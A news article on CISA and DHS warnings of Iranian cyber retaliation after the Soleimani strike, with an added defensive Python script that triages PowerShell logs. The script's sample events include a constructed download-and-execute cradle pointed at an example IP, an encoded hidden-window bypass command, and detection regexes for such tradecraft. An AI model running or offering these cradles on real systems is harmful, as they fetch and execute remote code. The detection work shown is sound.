The US Department of Homeland Security has issued a total of three warnings in the last few days encouraging people to be on the alert for physical and cyber attacks from Iran. The announcements follow the US killing of Qasem Soleimani, the commander of Iran’s IRGC-Quds Force. The warnings directly address IT professionals with advice on how to secure their networks against Iranian attack.
On Monday, the Cybersecurity and Infrastructure Security Agency (CISA), which is an agency within the DHS, released the latest publication in its CISA Insights series, which provides background information on cybersecurity threats to the US.
Without explicitly mentioning Soleimani’s killing, it referred to “recent Iran-US tensions” creating a heightened risk of retaliatory acts against the US and its global interests. Organizations should be on the lookout for potential threats, especially if they represent strategic targets such as finance, energy, or telecommunications, it said. Iranian attackers could launch attacks targeting intellectual property or mount disinformation campaigns, it said, while also raising the spectre of physical attacks using improvised explosive devices or unmanned drones.
The publication added:
Review your organisation from an outside perspective and ask the tough questions – are you attractive to Iran and its proxies because of your business model, who your customers and competitors are, or what you stand for?
The same day, CISA also issued an alert specifically targeting IT pros that warned of a potential Iranian cyber response to the military strike. It recommended five actions that IT professionals could take to protect themselves, focusing on a mixture of vulnerability mitigation and incident preparation.
IT pros should:
Disable all unnecessary ports and protocols. Reducing the network attack surface, along with monitoring open ports for command and control activity, will help to reduce network vulnerability and spot potential attackers rattling the doors.
Enhance monitoring of network and email traffic. Restricting attachment types and making sure detection signatures cover current malware and phishing themes will help to stop attackers before they reach users.
Patch externally facing equipment. Focus on critical vulnerabilities, the Agency warned, especially those that enable remote code execution or denial of service on public-facing equipment.
Log and limit PowerShell use. This built-in Microsoft scripting shell is a favourite of attackers, who use it to move through a compromised network without dropping new tools that security software might notice.
Keep backups updated. This means maintaining current backups that are air-gapped from the network, so that ransomware cannot reach them.
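Logging PowerShell only pays off if someone reads the logs. The script below is an example added to this article; it is not part of the CISA alert or any tool the agency published. It shows the kind of first-pass triage a defender can run over PowerShell script block log entries (Windows Event ID 4104 text, or process command lines that launch PowerShell): it decodes `-EncodedCommand` payloads, which are base64 of UTF-16LE text, and flags common attacker tradecraft such as download cradles, hidden-window launches and execution-policy bypasses. The event records, hostnames, URL and the indicator list are constructed for illustration, not real log data.

```python
"""Triage PowerShell script block text for common attacker indicators.

Example added to this article, not CISA's own tooling. Sample events
below are constructed; the indicator list is a starting point, not a
complete signature set.
"""

import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# -EncodedCommand may be abbreviated (-e, -ec, -en, -enc, ...). The payload is
# base64 of UTF-16LE text; require 16+ base64 characters to avoid short flags.
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, regex) pairs; each hit adds one point to the score.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("invoke-expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("download-cradle", re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|start-bitstransfer", re.I)),
    ("base64-decode", re.compile(r"frombase64string", re.I)),
    ("in-memory-load", re.compile(r"\[reflection\.assembly\]::load", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy-bypass", re.compile(r"-ex[a-z]*\s+bypass", re.I)),
    ("encoded-command", ENC_RE),
]


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    source: str
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def score(self) -> int:
        return len(self.indicators)


def triage(text: str, source: str = "event") -> Finding:
    """Score one script block. Decoded payloads are scanned alongside the raw text
    so that a cradle hidden behind -EncodedCommand is still caught."""
    finding = Finding(source=source, decoded=decode_encoded_command(text))
    haystack = text if finding.decoded is None else text + "\n" + finding.decoded
    for name, rx in INDICATORS:
        if rx.search(haystack):
            finding.indicators.append(name)
    return finding


def triage_events(events: List[Tuple[str, str]]) -> List[Finding]:
    """Triage a list of (source, script_block_text) pairs in input order."""
    return [triage(text, source) for source, text in events]


# Constructed sample script block texts (not real log data). The second one
# is built here so the encoded payload is a genuine UTF-16LE/base64 encoding.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("host01:4104", "Get-ChildItem C:\\Users | Sort-Object Length -Descending"),
    ("host02:4104", f"powershell.exe -NoP -W Hidden -Exec Bypass -enc {SAMPLE_ENCODED}"),
    ("host03:4104", "$b=[Convert]::FromBase64String($blob); [Reflection.Assembly]::Load($b)"),
]


if __name__ == "__main__":
    for f in sorted(triage_events(SAMPLE_EVENTS), key=lambda x: x.score, reverse=True):
        print(f"{f.source}: score={f.score} indicators={f.indicators}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

Scores are deliberately simple counts, so the script is a prioritiser rather than a verdict: a hit on `-EncodedCommand` alone is common in legitimate management tooling, while an encoded payload that expands to a hidden-window download cradle deserves an analyst's attention first.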
The publication and alert follow a National Terrorism Advisory System (NTAS) bulletin released on 4 January that mentioned the Soleimani strike and noted that Iran’s leaders along with affiliated organisations had vowed revenge against the US.
An attack in the homeland may come with little or no warning.
The US killed Qasem Soleimani using a Reaper drone on 3 January. The strike, which congressional leaders condemned, followed mounting rocket attacks against US bases in Iraq over the past two months.
Experts both in and outside the US government have long identified Iran as a source of malicious cyber activity. Last year, an analysis highlighted an increased focus on industrial control systems from the country’s APT33 hacking group. Almost exactly a year before, the US charged Iranian hackers for their role in an attack using the SamSam ransomware.
Over the weekend, hackers claiming Iranian backing defaced the US government’s Federal Depository Library Program website with a picture of a bloodied president Trump. On Tuesday, intruders altered the Texas Department of Agriculture’s website with a message stating “Hacked by Iranian Hacker”.